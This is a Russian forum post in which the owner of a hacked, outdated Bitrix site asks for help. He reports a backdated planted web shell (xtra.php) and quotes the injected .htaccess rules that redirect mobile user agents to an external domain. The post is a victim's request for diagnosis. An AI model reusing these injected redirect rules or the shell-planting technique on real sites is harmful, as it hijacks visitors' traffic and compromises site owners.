Коллеги, может кто сталкивался. Я что-то гуглом не могу найти через что меня хакнули.Обнаружил, что у меня модифицировали .htaccess : сделали редирект со всяких мобильных клиентов на сайт http://updateportalos.ru/?a=v294p274z4y2x4u2w4v2t2t2y3s2x454...
Дату создания файла сделали старой.
Залили шелл в корень xtra.php (тоже имеет дату создания раньше, чем его залили).
На сайте у меня битрикс древней версии. Есть подозрения, что атака шла только на битриксы, учитывая как был модифицирован .htaccess
Вот куски .htaccess:
"
# Rules for bitrix:
RewriteBase /
RewriteRule ^info/(.*) /information/$1 [L,R=301]
RewriteCond %{REQUEST_URI} !^/server-status
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-l
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !/bitrix/urlrewrite.php$
RewriteRule ^(.*)$ /bitrix/urlrewrite.php [L]
# Вот тут начинается вредоносная вставка:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
....
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
....
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
...
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://updateportalos.ru/?a=v294p274z4y2x4u2w4v2t2t2y3s2x454... [L,R=302]
# сам редирект
"
Интересно, куда копать?
Битрикс пока не могу обновить.
Буду очень благодарен за советы!
Вариант для распечатки
(??) on 19-Апр-12, 03:18 
